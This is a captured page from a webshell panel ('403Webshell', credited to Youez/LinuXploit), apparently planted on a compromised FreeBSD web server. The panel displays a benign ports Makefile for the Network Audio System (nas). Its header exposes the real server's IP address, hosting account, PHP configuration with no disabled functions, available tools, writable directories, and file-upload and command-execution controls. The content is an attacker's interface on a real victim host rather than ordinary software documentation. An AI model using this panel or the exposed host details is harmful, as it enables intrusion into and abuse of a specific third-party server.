403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/audio/nas/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/audio/nas/Makefile
PORTNAME=	nas
PORTVERSION=	1.9.4
PORTREVISION=	3
CATEGORIES=	audio
MASTER_SITES=	SF/${PORTNAME}/${PORTNAME}/${PORTNAME}%20${PORTVERSION}%20%28stable%29
EXTRACT_SUFX=	.src.tar.gz

MAINTAINER=	multimedia@FreeBSD.org
COMMENT=	Network Audio System
WWW=		https://radscan.com/nas.html

USES=		imake perl5 shebangfix xorg
SHEBANG_FILES=	clients/audio/auscope/auscope
USE_PERL5=	run
USE_CSTD=	gnu89
USE_XORG=	x11 xext xt xau sm ice xpm xmu xaw
USE_LDCONFIG=	yes
MAKE_ENV+=	COMPRESS_CMD="${COMPRESS_CMD:S/c//}"
MAKE_JOBS_UNSAFE=	yes

.include <bsd.port.pre.mk>

post-configure:
# Work around shortcomings of the Imake.rules et. al:
	${REINPLACE_CMD} -e 's:-fPIC:${FPIC} -DPIC:g' \
	    -e 's,-c \$$(CCOPTIONS),-c $$(CFLAGS),' \
	    -e 's,\(\$$(AR) \$$@ \$$\)(OBJS),\1(OBJS:S|^|unshared/|),' \
		${WRKSRC}/lib/audio/Makefile

.if ${ARCH} == "sparc64"
FPIC=	-fPIC
.else
FPIC=	-fpic
.endif

post-install:
	${STRIP_CMD} ${STAGEDIR}${PREFIX}/lib/libaudio.so.2

.include <bsd.port.post.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit